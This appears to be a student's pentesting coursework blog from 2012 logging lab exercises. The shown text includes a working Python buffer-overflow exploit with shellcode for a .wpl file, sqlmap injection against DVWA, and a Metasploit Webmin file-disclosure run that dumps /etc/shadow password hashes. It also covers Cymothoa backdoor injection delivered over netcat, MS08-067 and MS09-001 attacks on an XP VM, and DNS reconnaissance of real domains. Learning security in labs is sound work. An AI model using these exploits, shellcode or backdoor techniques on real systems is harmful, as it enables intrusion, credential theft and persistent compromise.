IS2C for scx010c081: 2012

Jumat, 17 Februari 2012

ok this is may last time try. I try to exploit using *.wpl extension. and here the result.
1. first picture explain that EIP fill by A character

2. picture describe that I was get fiil the EIP by DEADBEEF. I can get this after fill the stack using 43500 character junk

3. I use shlwapi to fine the JMP ESP command

4. and here my script

jnk="\x43" * (43500);

#jnk+="\xEF\xBE\xAD\xDE"

jnk+="\x27\xB2\xFA\x77"

#jnk+="\x41"*16

jnk+="\x90"*32

jnk+=("\x29\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x3f"

"\x20\xd3\x4e\x83\xeb\xfc\xe2\xf4\xc3\xc8\x97\x4e\x3f\x20\x58\x0b"

"\x03\xab\xaf\x4b\x47\x21\x3c\xc5\x70\x38\x58\x11\x1f\x21\x38\x07"

"\xb4\x14\x58\x4f\xd1\x11\x13\xd7\x93\xa4\x13\x3a\x38\xe1\x19\x43"

"\x3e\xe2\x38\xba\x04\x74\xf7\x4a\x4a\xc5\x58\x11\x1b\x21\x38\x28"

"\xb4\x2c\x98\xc5\x60\x3c\xd2\xa5\xb4\x3c\x58\x4f\xd4\xa9\x8f\x6a"

"\x3b\xe3\xe2\x8e\x5b\xab\x93\x7e\xba\xe0\xab\x42\xb4\x60\xdf\xc5"

"\x4f\x3c\x7e\xc5\x57\x28\x38\x47\xb4\xa0\x63\x4e\x3f\x20\x58\x26"

"\x03\x7f\xe2\xb8\x5f\x76\x5a\xb6\xbc\xe0\xa8\x1e\x57\x5e\x0b\xac"

"\x4c\x48\x4b\xb0\xb5\x2e\x84\xb1\xd8\x43\xb2\x22\x5c\x0e\xb6\x36"

"\x5a\x20\xd3\x4e")

ex = jnk

file=open("try.wpl","w")

file.write(ex)

file.close()

#alamat JMP ESP ADA DI 77FAB227 jika di balik menjadi "\x27\xB2\xFA\X77".ketemu di shlwapi.dll

Jumat, 10 Februari 2012

warFTP

when I write this I get a influenza. finnaly I must say that I'm fail on it. I was success install the war ftp but I'm file to configure it so it can connect with my backtrack. ok let see my trouble.

first I wanna show that the connection it's all fine it can see from the ping result

the next I will show about the warFTP config

from picture above we know that the warftp properly set...

but my problem come when I start to conect using nc

I was try to make the exploit but I was read the book many time but I still not understand and still to many question may be it because i'm really don't know about python. I need help.... and my physic condition it is not to good. sorry I was try hard

how to use sqlmap

what is sqlmap
sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a kick-ass detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.
how to use it
first thing that must we do before use this tools is we must make sure that the web are had a vulnerability in SQLi. for example http://192.168.0.21/data/get_int.php?id=1 when we put the single quote after the last address and we see some thing error on it. it mean that we can use the sqlmap.int he class we know that dvwa have an vulnerability in sqli so we just type like bellow

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=%27&Submit=Submit" --cookie="security=low; Xplico=6pkfig990001f3sqqmmjcr5im7; PHPSESSID=ao6gfq0ou4bafia7vphn6qfvl0" --dbs

command above will produce the information about the database content on the server.

sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool

http://sqlmap.sourceforge.net

[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.

[*] starting at: 21:53:15

[21:53:15] [INFO] using '/pentest/database/sqlmap/output/localhost/session' as session file

[21:53:15] [INFO] testing connection to the target url

[21:53:15] [INFO] heuristics detected web page charset 'ascii'

[21:53:16] [WARNING] there is a DBMS error found in the HTTP response bodywhich could interfere with the results of the tests

[21:53:16] [INFO] testing if the url is stable, wait a few seconds

[21:53:17] [INFO] url is stable

[21:53:17] [INFO] testing if GET parameter 'id' is dynamic

[21:53:17] [INFO] confirming that GET parameter 'id' is dynamic

[21:53:17] [INFO] GET parameter 'id' is dynamic

[21:53:17] [INFO] heuristic test shows that GET parameter 'id' might be injectable (possible DBMS: MySQL)

[21:53:17] [INFO] testing sql injection on GET parameter 'id'

[21:53:17] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'

[21:53:17] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'

[21:53:17] [INFO] testing 'MySQL > 5.0.11 stacked queries'

[21:53:17] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'

parsed error message(s) showed that the back-end DBMS could be MySQL. Do you want to skip test payloads specific for other DBMSes? [Y/n] y

[21:53:24] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'

[21:53:24] [INFO] target url appears to be UNION injectable with 2 columns

[21:53:24] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 10 columns' injectable

GET parameter 'id' is vulnerable. Do you want to keep testing the others? [y/N] y

[21:53:28] [INFO] testing if GET parameter 'Submit' is dynamic

[21:53:28] [WARNING] GET parameter 'Submit' appears to be not dynamic

[21:53:28] [INFO] heuristic test shows that GET parameter 'Submit' might be injectable (possible DBMS: MySQL)

[21:53:28] [INFO] testing sql injection on GET parameter 'Submit'

[21:53:28] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'

[21:53:29] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'

[21:53:29] [INFO] testing 'MySQL > 5.0.11 stacked queries'

[21:53:29] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'

[21:53:29] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'

[21:53:29] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'

[21:53:30] [WARNING] GET parameter 'Submit' is not injectable

sqlmap identified the following injection points with a total of 149 HTTP(s) requests:

---

Place: GET

Parameter: id

Type: UNION query

Title: MySQL UNION query (NULL) - 1 to 10 columns

Payload: id=' UNION ALL SELECT NULL, CONCAT(CHAR(58,116,101,121,58),CHAR(84,105,69,117,65,89,80,116,111,103),CHAR(58,99,116,99,58))# &Submit=Submit

---

[21:53:30] [INFO] manual usage of GET payloads requires url encoding

[21:53:30] [INFO] testing MySQL

[21:53:30] [INFO] confirming MySQL

[21:53:30] [INFO] the back-end DBMS is MySQL

web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)

web application technology: PHP 5.3.2, Apache 2.2.14

back-end DBMS: MySQL >= 5.0.0

[21:53:30] [INFO] fetching database names

available databases [4]:

[*] dvwa

[*] fbip

[*] information_schema

[*] mysql

[21:53:30] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/localhost'

[*] shutting down at: 21:53:30

we see that in the end information server available data base. there are 4 database. what about to dump the database. to dump the database we must type command like bellow

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id='&Submit=Submit" --cookie="security=low; Xplico=6pkfig990001f3sqqmmjcr5im7; PHPSESSID=ao6gfq0ou4bafia7vphn6qfvl0"-D mysql --dump

Kamis, 09 Februari 2012

previllage escalation

the based rule that must we use in the way of hacking is

Information Gathering
Service Enumeration
Vulnerability Assessment
Exploit

sabtu 04 Febryari 2012 we have duty to do a previllage escalation in the computer 192.168.0.21. the most important is we only have 10 minut time.

first step is information gathering. use nmap to gathering information about what else service that running on the suspect.

root@bt:~# nmap -sV 192.168.0.21

Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-02-04 18:06 WIT

Nmap scan report for 192.168.0.21

Host is up (0.0016s latency).

Not shown: 995 closed ports

PORT STATE SERVICE VERSION

22/tcp open ssh OpenSSH 4.6p1 Debian 5build1 (protocol 2.0)

80/tcp open http Apache httpd 2.2.4 ((Ubuntu) PHP/5.2.3-1ubuntu6)

139/tcp open netbios-ssn Samba smbd 3.X (workgroup: MSHOME)

445/tcp open netbios-ssn Samba smbd 3.X (workgroup: MSHOME)

10000/tcp open http MiniServ 0.01 (Webmin httpd)

MAC Address: 08:00:27:F9:C1:BB (Cadmus Computer Systems)

Service Info: OS: Linux; CPE: cpe:/o:linux:kernel

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 24.51 seconds

from teks above we know something different in the port 1000 with a clue web min httpd. from that information we directly use the meta exploit to looking some tools that may be we can use.

msf > search webmin

Matching Modules

================

Name Disclosure Date Rank Description

---- --------------- ---- -----------

auxiliary/admin/webmin/file_disclosure 2006-06-30 normal Webmin file disclosure

msf > use auxiliary/admin/webmin/file_disclosure

msf auxiliary(file_disclosure) > set rhost 192.168.0.21

rhost => 192.168.0.21

msf auxiliary(file_disclosure) > exploit

[*] Attempting to retrieve /etc/passwd...

[*] The server returned: 200 Document follows

root:x:0:0:root:/root:/bin/bash

daemon:x:1:1:daemon:/usr/sbin:/bin/sh

bin:x:2:2:bin:/bin:/bin/sh

sys:x:3:3:sys:/dev:/bin/sh

sync:x:4:65534:sync:/bin:/bin/sync

games:x:5:60:games:/usr/games:/bin/sh

man:x:6:12:man:/var/cache/man:/bin/sh

lp:x:7:7:lp:/var/spool/lpd:/bin/sh

mail:x:8:8:mail:/var/mail:/bin/sh

news:x:9:9:news:/var/spool/news:/bin/sh

uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh

proxy:x:13:13:proxy:/bin:/bin/sh

www-data:x:33:33:www-data:/var/www:/bin/sh

backup:x:34:34:backup:/var/backups:/bin/sh

list:x:38:38:Mailing List Manager:/var/list:/bin/sh

irc:x:39:39:ircd:/var/run/ircd:/bin/sh

gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh

nobody:x:65534:65534:nobody:/nonexistent:/bin/sh

dhcp:x:100:101::/nonexistent:/bin/false

syslog:x:101:102::/home/syslog:/bin/false

klog:x:102:103::/home/klog:/bin/false

mysql:x:103:107:MySQL Server,,,:/var/lib/mysql:/bin/false

sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin

vmware:x:1000:1000:vmware,,,:/home/vmware:/bin/bash

obama:x:1001:1001::/home/obama:/bin/bash

osama:x:1002:1002::/home/osama:/bin/bash

yomama:x:1003:1003::/home/yomama:/bin/bash

[*] Auxiliary module execution completed

msf auxiliary(file_disclosure) > ls

[*] exec: ls

0bf3a6a5724cf0b0499ca7e73ac252ae.rtf

404606_2784683289646_1035152752_32311634_134946266_n.jpg

builder32-2

c16547b957eb2413ec509c66343cd7cb.rtf

Desktop

ed3691697b313fbb1bdf495b7fb1c9a3.rtf

meterpreter.pdf

VirtualBox VMs

upst.... something wrong why the password does not appear?? ok let see the option by typing show options

msf auxiliary(file_disclosure) > show options

Module options (auxiliary/admin/webmin/file_disclosure):

Name Current Setting Required Description

---- --------------- -------- -----------

DIR /unauthenticated yes Webmin directory path

Proxies no Use a proxy chain

RHOST 192.168.0.21 yes The target address

RPATH /etc/passwd yes The file to download

RPORT 10000 yes The target port

VHOST no HTTP server virtual host

msf auxiliary(file_disclosure) > set rpath /etc/shadow/

rpath => /etc/shadow/

msf auxiliary(file_disclosure) > exploit

[*] Attempting to retrieve /etc/shadow/...

[*] The server returned: 200 Document follows

root:$1$LKrO9Q3N$EBgJhPZFHiKXtK0QRqeSm/:14041:0:99999:7:::

daemon:*:14040:0:99999:7:::

bin:*:14040:0:99999:7:::

sys:*:14040:0:99999:7:::

sync:*:14040:0:99999:7:::

games:*:14040:0:99999:7:::

man:*:14040:0:99999:7:::

lp:*:14040:0:99999:7:::

mail:*:14040:0:99999:7:::

news:*:14040:0:99999:7:::

uucp:*:14040:0:99999:7:::

proxy:*:14040:0:99999:7:::

www-data:*:14040:0:99999:7:::

backup:*:14040:0:99999:7:::

list:*:14040:0:99999:7:::

irc:*:14040:0:99999:7:::

gnats:*:14040:0:99999:7:::

nobody:*:14040:0:99999:7:::

dhcp:!:14040:0:99999:7:::

syslog:!:14040:0:99999:7:::

klog:!:14040:0:99999:7:::

mysql:!:14040:0:99999:7:::

sshd:!:14040:0:99999:7:::

vmware:$1$7nwi9F/D$AkdCcO2UfsCOM0IC8BYBb/:14042:0:99999:7:::

obama:$1$hvDHcCfx$pj78hUduionhij9q9JrtA0:14041:0:99999:7:::

osama:$1$Kqiv9qBp$eJg2uGCrOHoXGq0h5ehwe.:14041:0:99999:7:::

yomama:$1$tI4FJ.kP$wgDmweY9SAzJZYqW76oDA.:14041:0:99999:7:::

[*] Auxiliary module execution completed

msf auxiliary(file_disclosure) > ls

[*] exec: ls

0bf3a6a5724cf0b0499ca7e73ac252ae.rtf

404606_2784683289646_1035152752_32311634_134946266_n.jpg

builder32-2

c16547b957eb2413ec509c66343cd7cb.rtf

Desktop

ed3691697b313fbb1bdf495b7fb1c9a3.rtf

meterpreter.pdf

VirtualBox VMs

binggo we get the list off password and the user name obama root etc ... that all done

how to use cymothoa

in the post before it I was explain about cymothoa so it time to write about it. actually when we type cymothoa there will be allot of help how to use it.first type

>cymothoa -S

script above to show the list of injection that we can use.

to inject the proses we need the process ID or PID to get the PID just type

>ps -ax

that command will produce the list of process that running on the system

after we know the PID we can begin the injection by typing

>cymothoa -p 1140 -s 0 -y 9000

command above have meaning that we use the shell number 0 and inject the process with PID 1140 in port 9000

we see that infection done. when we check the process so will be two kind off process with the same name.
inthe to make sure that our injection is done we can scan using nmap

see that port 9000 is open. with service name listener.

Rabu, 08 Februari 2012

how to backdooring using nc

the next duty about NC (net cat) not (net cut)...first what is nc....
Netcat is a computer networking service for reading from and writing network connections using TCP or UDP. Netcat is designed to be a dependable “back-end” device that can be used directly or easily driven by other programs and scripts. At the same time, it is a feature-rich network debugging and investigation tool, since it can produce almost any kind of correlation you would need and has a number of built-in capabilities.
actually this is use full tool that can listening to the some port etc.
by default is included in the linux OS but when we practice in the class we found that nc does not exist on the system. so what the solution?? the solutions is copy the binary of nc.traditional from the bt5 and then put the file binary in the /bin/ directory.
after nc properly copied into the ubuntu system we can try to execute nc with a command

root@ubuntu-VirtualBox:/bin# ./nc.traditional -l -p 9000

the meaning of the command above is to execute nc and listening into port 9000. in our host use nc with a command

nc 192.168.43.129 9000

to identify that our connection is done. we can type anything in the console. and all anything that we have type will show up in the other side. more clear we can see an illustration picture bellow :

from picture above we can see that anything we type will show in other host(guest host). picture above is describe that we conecting using nc. if we were connect the next step is send the cymothoa to the guest. how to do that. but before we do that may be we confuse about what is cymothoa is???

Cymothoa is a stealth backdooring tool, that inject backdoor’s shellcode into an existing process. The tool uses the ptrace library (available on nearly all * nix), to manipulate processes and infect them.

back again tothe main point or the next step to send cymothoa to the ubuntu system we can use command lke bellow :

nc 192.168.43.129 9000 < cymothoa

important note before we execute command above we must make sure that we were be in the cymothoa file directory /pentest/backdoors/cymotho/ in the client side(UBUNTU we must type

>cymothoa

if it is done well so in the path that we get well created file named cymothoa. just gift permission to 777 and then to test that the file are work type command bellow

./cymothoa

if all anything doing fine so will look like picture bellow

Kamis, 02 Februari 2012

Exploit The XP SP3

from the other duty that I get, I think this is the most difficult. Exploit the win xp sp3. I don't have any idea how I must start. When in the class the assistant does not explain what must to do. he only say use the nessus to gather information and catch something vulnerable. And then use the exploitdb.

Ok to the point aja... to start the nessus as we know that nessus walk on 8834 port so just type in the address bar https://localhost:8834 wait for a while and login using the username and password that we was enter before.

Ok after we enter the right username and password we will enter the nessus page like picture bellow.

On the picture above choose scan so we will make a new project scaner and just enter the add button

enter the name of our project type etc just like picture bellow and click launch scan

after we press Launch scan, the scan will began and wait until the process done.

Se that the scan get six high result that we can exploit. On it. To see the detail just double click on it. And if we wanna see the detail just click and nessus will tells us the detail

if we click so will show detail like picture bellow

using nessuss done. It's time to use the meta exploit or exploit db honestly until now to many question about how to use the exploit?? how.. how.. and how....?? I try to ask google some help but I did not get the right answer.

Omg Alhamdulilahirobilalamin.. puji tuhan thanks god masyaallah at least I understand how to use it... emh.... now 21.11 at 02 februari 2012.. I know.. I know.. I know...

after round-round (puter-puter) and searching searching at least I understand. Ok do not to many talk we directly go to the case. We found MS09-001 just search in the meta exploit.

eh... before do that first we must enter to the meta exploit first by typing msfconsole

and we will enter to the meta-exploit console and then type search ms09-001 remember that ms09-001 is the clue that we get from the nessus scan. Ok not to many talk just see our detail picture bellow

based picture above we know that there some exploit found. Nah... this is the big question that I have finally break. How to use this exploit?????? it's simply just type

use auxiliary/dos/windows/smb/ms09_001_write

the next step is set the rhost by typing rhost 192.168.43.128. remember that our target is 192.168.43.128 and pres enter. The next step is type exploit.

Binggo and what the result?? the result is the win_xp sp3 in virtual box restart. I dificult to proof it in the blog but this picture bellow can Represented it.

I wanna try another bug. We found six bug right :D :D :D the next bug is MS08_067

oh my god I found some think new on it.. I found meterpreter and I don't know what must to do with it.

Whoooooooooohohohohohohoho.... What I have found??

I try to use ls command and I get all directory in the windows. Nice it is very nice..... Thank to god...

that is all my experience to night... this is not the end bu this is the beginning. it is my first experience and will be my best experience. I'l never forget how happy I'm... I always say Alhamdulilahiroibbil alamin... puji kepada tuhanku Allah SWT tuhan sekalian alam...

Selasa, 31 Januari 2012

information gathering for is2c-dojo and spentera

in this case I use dnsenum as my tools to use dns enum is just simply type

root@bt:/pentest/enumeration/dns/dnsenum# ./dnsenum.pl is2c-dojo.com

so that script will produce information about is2c-dojo.com and the result is :

root@bt:/pentest/enumeration/dns/dnsenum# ./dnsenum.pl is2c-dojo.com
dnsenum.pl VERSION:1.2.2

-----   is2c-dojo.com   -----

Host's addresses:
__________________

is2c-dojo.com                            13419    IN    A        67.222.154.106

Name Servers:
______________

ns2.partnerit.us                         9826     IN    A        67.222.154.107
ns1.partnerit.us                         9826     IN    A        67.222.154.106

Mail (MX) Servers:
___________________



Trying Zone Transfers and getting Bind Versions:
_________________________________________________


Trying Zone Transfer for is2c-dojo.com on ns2.partnerit.us ...
AXFR record query failed: NOERROR

ns2.partnerit.us Bind Version: #9.3.6-P1-RedHat-9.3.6-16.P1.el5_7.1

Trying Zone Transfer for is2c-dojo.com on ns1.partnerit.us ...
AXFR record query failed: NOERROR

ns1.partnerit.us Bind Version: #9.3.6-P1-RedHat-9.3.6-16.P1.el5_7.1

brute force file not specified, bay.
root@bt:/pentest/enumeration/dns/dnsenum# ./dnsenum.pl is2c-dojo.com -w
dnsenum.pl VERSION:1.2.2
Warning: can't load Net::Whois::IP module, whois queries disabled.

-----   is2c-dojo.com   -----


Host's addresses:
__________________

is2c-dojo.com                            13392    IN    A        67.222.154.106


Name Servers:
______________

ns1.partnerit.us                         9789     IN    A        67.222.154.106


Mail (MX) Servers:
___________________

aspmx.l.google.com                       92       IN    A        74.125.65.27


Trying Zone Transfers and getting Bind Versions:
_________________________________________________


Trying Zone Transfer for is2c-dojo.com on ns2.partnerit.us ...
AXFR record query failed: NOERROR

ns2.partnerit.us Bind Version: #9.3.6-P1-RedHat-9.3.6-16.P1.el5_7.1

Trying Zone Transfer for is2c-dojo.com on ns1.partnerit.us ...
AXFR record query failed: NOERROR

ns1.partnerit.us Bind Version: #9.3.6-P1-RedHat-9.3.6-16.P1.el5_7.1

brute force file not specified, bay.

and information that I get from domain www.is2c-dojo.net is:

root@bt:/pentest/enumeration/dns/dnsenum# ./dnsenum.pl is2c-dojo.net -w
dnsenum.pl VERSION:1.2.2
Warning: can't load Net::Whois::IP module, whois queries disabled.

-----   is2c-dojo.net   -----


Host's addresses:
__________________

is2c-dojo.net                            28800    IN    A        216.239.38.21
is2c-dojo.net                            28800    IN    A        216.239.32.21
is2c-dojo.net                            28800    IN    A        216.239.34.21
is2c-dojo.net                            28800    IN    A        216.239.36.21


Name Servers:
______________

partnerit1.earth.orderbox-dns.com        158355   IN    A        67.15.47.189
partnerit1.earth.orderbox-dns.com        158355   IN    A        67.15.253.220
partnerit1.earth.orderbox-dns.com        158355   IN    A        67.15.47.188
partnerit1.earth.orderbox-dns.com        158355   IN    A        67.15.253.219
partnerit1.mercury.orderbox-dns.com      158355   IN    A        50.23.136.174
partnerit1.mercury.orderbox-dns.com      158355   IN    A        50.23.136.229
partnerit1.mercury.orderbox-dns.com      158355   IN    A        50.23.136.230
partnerit1.mercury.orderbox-dns.com      158355   IN    A        50.23.136.173
partnerit1.mars.orderbox-dns.com         158355   IN    A        184.173.149.221
partnerit1.mars.orderbox-dns.com         158355   IN    A        184.173.150.57
partnerit1.mars.orderbox-dns.com         158355   IN    A        184.173.150.58
partnerit1.mars.orderbox-dns.com         158355   IN    A        184.173.149.222
partnerit1.venus.orderbox-dns.com        158354   IN    A        50.23.75.45
partnerit1.venus.orderbox-dns.com        158354   IN    A        50.23.75.96
partnerit1.venus.orderbox-dns.com        158354   IN    A        50.23.75.44
partnerit1.venus.orderbox-dns.com        158354   IN    A        50.23.75.97


Mail (MX) Servers:
___________________



Trying Zone Transfers and getting Bind Versions:
_________________________________________________


Trying Zone Transfer for is2c-dojo.net on partnerit1.earth.orderbox-dns.com ...
AXFR record query failed: query timed out
Unable to obtain Server Version for partnerit1.earth.orderbox-dns.com : query timed out

Trying Zone Transfer for is2c-dojo.net on partnerit1.mercury.orderbox-dns.com ...
AXFR record query failed: NOERROR

partnerit1.mercury.orderbox-dns.com Bind Version: LServed by POWERDNS 3.0 $Id: packethandler.cc 2231 2011-07-11 07:25:27Z ahu $

Trying Zone Transfer for is2c-dojo.net on partnerit1.mars.orderbox-dns.com ...
AXFR record query failed: NOERROR

partnerit1.mars.orderbox-dns.com Bind Version: LServed by POWERDNS 3.0 $Id: packethandler.cc 2231 2011-07-11 07:25:27Z ahu $

Trying Zone Transfer for is2c-dojo.net on partnerit1.venus.orderbox-dns.com ...
AXFR record query failed: NOERROR

partnerit1.venus.orderbox-dns.com Bind Version: LServed by POWERDNS 3.0 $Id: packethandler.cc 2231 2011-07-11 07:25:27Z ahu $

brute force file not specified, bay.

information that I get from domain www.spentera.com is:

root@bt:/pentest/enumeration/dns/dnsenum# ./dnsenum.pl spentera.com
dnsenum.pl VERSION:1.2.2

-----   spentera.com   -----


Host's addresses:
__________________

spentera.com                             1200     IN    A        74.81.66.104


Name Servers:
______________

dns2.namecheaphosting.com                1200     IN    A        199.204.19.79
dns1.namecheaphosting.com                1200     IN    A        74.81.65.92


Mail (MX) Servers:
___________________

aspmx2.googlemail.com                    1016     IN    A        74.125.43.27
alt2.aspmx.l.google.com                  293      IN    A        74.125.157.27
aspmx3.googlemail.com                    3355     IN    A        74.125.127.27
aspmx.l.google.com                       171      IN    A        74.125.53.27


Trying Zone Transfers and getting Bind Versions:
_________________________________________________


Trying Zone Transfer for spentera.com on dns2.namecheaphosting.com ...
AXFR record query failed: NOERROR

dns2.namecheaphosting.com Bind Version: OServed by POWERDNS 2.9.22 $Id: packethandler.cc 1321 2008-12-06 19:44:36Z ahu $

Trying Zone Transfer for spentera.com on dns1.namecheaphosting.com ...
AXFR record query failed: NOERROR

dns1.namecheaphosting.com Bind Version: OServed by POWERDNS 2.9.22 $Id: packethandler.cc 1321 2008-12-06 19:44:36Z ahu $

brute force file not specified, bay. Servers:
______________

dns2.namecheaphosting.com                1200     IN    A        199.204.19.79
dns1.namecheaphosting.com                1200     IN    A        74.81.65.92


Mail (MX) Servers:
___________________

aspmx2.googlemail.com                    1016     IN    A        74.125.43.27
alt2.aspmx.l.google.com                  293      IN    A        74.125.157.27
aspmx3.googlemail.com                    3355     IN    A        74.125.127.27
aspmx.l.google.com                       171      IN    A        74.125.53.27


Trying Zone Transfers and getting Bind Versions:
_________________________________________________


Trying Zone Transfer for spentera.com on dns2.namecheaphosting.com ...
AXFR record query failed: NOERROR

dns2.namecheaphosting.com Bind Version: OServed by POWERDNS 2.9.22 $Id: packethandler.cc 1321 2008-12-06 19:44:36Z ahu $

Trying Zone Transfer for spentera.com on dns1.namecheaphosting.com ...
AXFR record query failed: NOERROR

dns1.namecheaphosting.com Bind Version: OServed by POWERDNS 2.9.22 $Id: packethandler.cc 1321 2008-12-06 19:44:36Z ahu $

brute force file not specified, bay.

when I use what web aplication I get some thing like this

http://is2c-dojo.net [301] Country[UNITED STATES][US], Title[301 Moved], UncommonHeaders[x-xss-protection,x-frame-options], RedirectLocation[http://www.is2c-dojo.net/], HTTPServer[ghs], X-XSS-Protection[1; mode=block], IP[216.239.32.21], X-Frame-Options[SAMEORIGIN]
URL    : http://is2c-dojo.net
Status : 301
   Country --------------------------------------------------------------------
        Description: GeoIP IP2Country lookup. To refresh DB, replace
                     IpToCountry.csv and remove country-ips.dat. GeoIP database
                     from http://software77.net/geo-ip/. Local IPv4 addresses
                     are represented as ZZ according to an ISO convention.
                     Lookup code developed by Matthias Wachter for rubyquiz.com
                     and used with permission.
        String     : UNITED STATES
        Module     : US

   HTTPServer -----------------------------------------------------------------
        Description: HTTP server header string. This plugin also attempts to
                     identify the operating system from the server header.
        String     : ghs (from server string)

   IP -------------------------------------------------------------------------
        Description: IP address of the target, if available.
        String     : 216.239.32.21

   RedirectLocation -----------------------------------------------------------
        Description: HTTP Server string location. used with http-status 301 and
                     302
        String     : http://www.is2c-dojo.net/ (from location)

   Title ----------------------------------------------------------------------
        Description: The HTML page title
        String     : 301 Moved (from page title)

   UncommonHeaders ------------------------------------------------------------
        Description: Uncommon HTTP server headers. The blacklist includes all
                     the standard headers and many non standard but common ones.
                     Interesting but fairly common headers should have their own
                     plugins, eg. x-powered-by, server and x-aspnet-version.
                     Info about headers can be found at www.http-stats.com
        String     : x-xss-protection,x-frame-options (from headers)

   X-Frame-Options ------------------------------------------------------------
        Description: This plugin retrieves the X-Frame-Options value from the
                     HTTP header. - More Info:
                     http://msdn.microsoft.com/en-us/library/cc288472%28VS.85%29.
                     aspx

        String     : SAMEORIGIN

   X-XSS-Protection -----------------------------------------------------------
        Description: This plugin retrieves the X-XSS-Protection value from the
                     HTTP header. - More Info:
                     http://msdn.microsoft.com/en-us/library/cc288472%28VS.85%29.
                     aspx

        String     : 1; mode=block

http://www.is2c-dojo.net/ ERROR: Timed out execution expired
root@bt:/pentest/enumeration/web/whatweb# ./whatweb -v is2c-dojo.com
http://is2c-dojo.com/ [403]
http://is2c-dojo.com [403] Country[UNITED STATES][US], Title[403 Forbidden], HTTPServer[nginx admin], IP[67.222.154.106]
URL    : http://is2c-dojo.com
Status : 403
   Country --------------------------------------------------------------------
        Description: GeoIP IP2Country lookup. To refresh DB, replace
                     IpToCountry.csv and remove country-ips.dat. GeoIP database
                     from http://software77.net/geo-ip/. Local IPv4 addresses
                     are represented as ZZ according to an ISO convention.
                     Lookup code developed by Matthias Wachter for rubyquiz.com
                     and used with permission.
        String     : UNITED STATES
        Module     : US

   HTTPServer -----------------------------------------------------------------
        Description: HTTP server header string. This plugin also attempts to
                     identify the operating system from the server header.
        String     : nginx admin (from server string)

   IP -------------------------------------------------------------------------
        Description: IP address of the target, if available.
        String     : 67.222.154.106

   Title ----------------------------------------------------------------------
        Description: The HTML page title
        String     : 403 Forbidden (from page title)

root@bt:/pentest/enumeration/web/whatweb# ./whatweb -v spentera.com
http://spentera.com ERROR: Timed out execution expired

honestly until now I still not understand what can I do with this information. and unfortunately the server maybe temporary down. I don't know is the matter in my connection or the server really down?? I can't access all the mr.mada web...